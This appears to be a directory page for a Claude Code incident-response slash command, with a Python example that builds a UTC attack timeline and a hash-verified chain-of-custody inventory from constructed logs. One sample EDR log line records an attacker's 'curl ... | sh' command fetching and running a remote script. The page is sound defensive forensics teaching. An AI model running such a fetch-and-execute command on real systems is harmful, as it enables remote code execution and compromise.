From incident-response
Conduct forensic investigation of suspected breaches including evidence collection and timeline reconstruction.
Trigger: slash command

Usage: `/incident-response:investigate-breach <affected system or incident details>`

Summary Claude sees in its command listing (used to decide when to auto-load this command):
# Investigate Breach Command

Chain these steps:

1. Use `forensic-analysis-guide` to develop a forensic investigation plan
2. Use `evidence-preservation` to collect and preserve digital evidence
3. Use `root-cause-analysis-security` to determine how the breach occurred
4. Reconstruct the attack timeline from logs and evidence

Deliverables:

- Forensic investigation report
- Evidence inventory with chain of custody
- Attack timeline showing attacker actions
- Root cause analysis identifying the vulnerability exploited
- Breach scope: what data/systems were compromised

After completion, suggest follow-up commands: respond-to-incident, write-postmortem.
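Steps 2 and 4 and the "evidence inventory with chain of custody" and "attack timeline" deliverables, as an added worked example written for this page (not the plugin's own code and not what Claude generates): constructed log excerpts from three sources with different timestamp conventions (syslog with no year and a host-local clock, an Apache combined-format access log, an EDR JSON line) are normalised to UTC and merged into one ordered timeline, and each evidence item is hashed at collection and re-hashed at every custody hand-off. The hostname `web01`, the address `203.0.113.7`, the 2024 capture year and the UTC-04:00 host clock are assumptions made for the example.

```python
"""Added example: merge constructed logs into a UTC-ordered attack timeline and
keep an evidence inventory re-hashed at every custody handover. Not code from
the incident-response plugin; hosts, IPs and times are made up."""
import hashlib
import json
import re
from datetime import datetime, timedelta, timezone

# Constructed excerpts from one hypothetical intrusion. Formats differ on purpose:
# syslog (no year, host-local clock), Apache combined log (explicit offset),
# EDR JSON line (ISO 8601 in UTC).
AUTH_LOG = """\
Mar 14 02:11:07 web01 sshd[4127]: Failed password for admin from 203.0.113.7 port 51022 ssh2
Mar 14 02:11:09 web01 sshd[4127]: Failed password for admin from 203.0.113.7 port 51022 ssh2
Mar 14 02:11:12 web01 sshd[4127]: Accepted password for admin from 203.0.113.7 port 51022 ssh2
"""
ACCESS_LOG = """\
203.0.113.7 - - [14/Mar/2024:06:14:33 +0000] "GET /admin/export?table=customers HTTP/1.1" 200 88213
203.0.113.7 - - [14/Mar/2024:06:14:51 +0000] "POST /admin/upload HTTP/1.1" 200 512
"""
EDR_LOG = '{"ts": "2024-03-14T06:15:02Z", "host": "web01", "event": "process_create", "user": "admin", "cmd": "curl http://203.0.113.7/x.sh | sh"}\n'
# Assumed for the syslog source (it carries neither year nor zone): the capture
# is from 2024 and web01's clock is UTC-04:00. Get the offset wrong and the
# timeline gains a bogus multi-hour gap or reorders events; record it in the report.
SYSLOG_YEAR = 2024
SYSLOG_TZ = timezone(timedelta(hours=-4))
SYSLOG_RE = re.compile(r"^(\w{3}) +(\d{1,2}) (\d\d:\d\d:\d\d) (\S+) (\S+?)(?:\[\d+\])?: (.*)$")
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\d+|-)')

def parse_syslog(line, year=SYSLOG_YEAR, tz=SYSLOG_TZ):
    """Syslog line -> event with UTC timestamp, or None if it does not parse."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    mon, day, hms, host, prog, msg = m.groups()
    local = datetime.strptime(f"{year} {mon} {day} {hms}", "%Y %b %d %H:%M:%S")
    return {"ts": local.replace(tzinfo=tz).astimezone(timezone.utc),
            "source": "auth.log", "host": host, "summary": f"{prog}: {msg}"}

def parse_access(line, host="web01"):
    """Combined-format web log line -> event, or None."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    ip, ts, req, status, size = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
    return {"ts": when, "source": "access.log", "host": host,
            "summary": f"{ip} {req} -> {status} ({size} bytes)"}

def parse_edr(line):
    """EDR JSON record -> event, or None for blank lines."""
    if not line.strip():
        return None
    rec = json.loads(line)
    when = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00")).astimezone(timezone.utc)
    return {"ts": when, "source": "edr", "host": rec["host"],
            "summary": f"{rec['event']} by {rec['user']}: {rec['cmd']}"}

def build_timeline(sources):
    """sources: iterable of (raw_text, parser). Returns events sorted by UTC time."""
    events = [ev for text, parser in sources
              for ev in map(parser, text.splitlines()) if ev]
    return sorted(events, key=lambda ev: ev["ts"])

def render_timeline(events):
    return "\n".join(f"{ev['ts']:%Y-%m-%dT%H:%M:%SZ} {ev['host']:<6} {ev['source']:<10} {ev['summary']}"
                     for ev in events)

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def inventory_evidence(items, collector, when_iso):
    """items: {name: bytes}. Size and hash are fixed at collection; every later
    hand-off is appended to the custody list."""
    return [{"item": n, "size": len(d), "sha256": sha256_hex(d),
             "custody": [(collector, when_iso, "collected")]} for n, d in items.items()]

def transfer_custody(record, data, recipient, when_iso):
    """Re-hash at hand-off; refuse the transfer if the bytes no longer match."""
    if sha256_hex(data) != record["sha256"]:
        return False
    record["custody"].append((recipient, when_iso, "received"))
    return True

if __name__ == "__main__":
    tl = build_timeline([(AUTH_LOG, parse_syslog), (ACCESS_LOG, parse_access), (EDR_LOG, parse_edr)])
    print(render_timeline(tl))
    inv = inventory_evidence({"web01:/var/log/auth.log": AUTH_LOG.encode(),
                              "web01:/var/log/apache2/access.log": ACCESS_LOG.encode(),
                              "edr-export.jsonl": EDR_LOG.encode()}, "analyst-1", "2024-03-14T09:00:00Z")
    for rec in inv:
        print(rec["sha256"], rec["size"], rec["item"])
```

The clock-offset assumption is the kind of fact the forensic investigation report has to state explicitly: the merged timeline only shows the SSH brute force preceding the export request because the syslog entries were shifted to UTC. The inventory records hash and size at collection and `transfer_custody` refuses a hand-off whose bytes no longer match, which is the minimum a chain-of-custody record needs to survive challenge.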
Related commands:

- `/ir` (from sethdford/claude-skills; install with `npx claudepluginhub sethdford/claude-skills --plugin security-incident-response`): Runs the incident response workflow for an incident type (compromise, ransomware, etc.): triages via the dfir agent, captures snapshots, extracts IOCs, builds a timeline, generates deliverables.
- `/investigate-incident`: Investigates a Huntress incident by ID: retrieves details, affected hosts, timeline, remediations, and recommends approval or rejection with next steps.
- `/incident-response`: Starts incident response with severity classification, role assignment, and an action plan.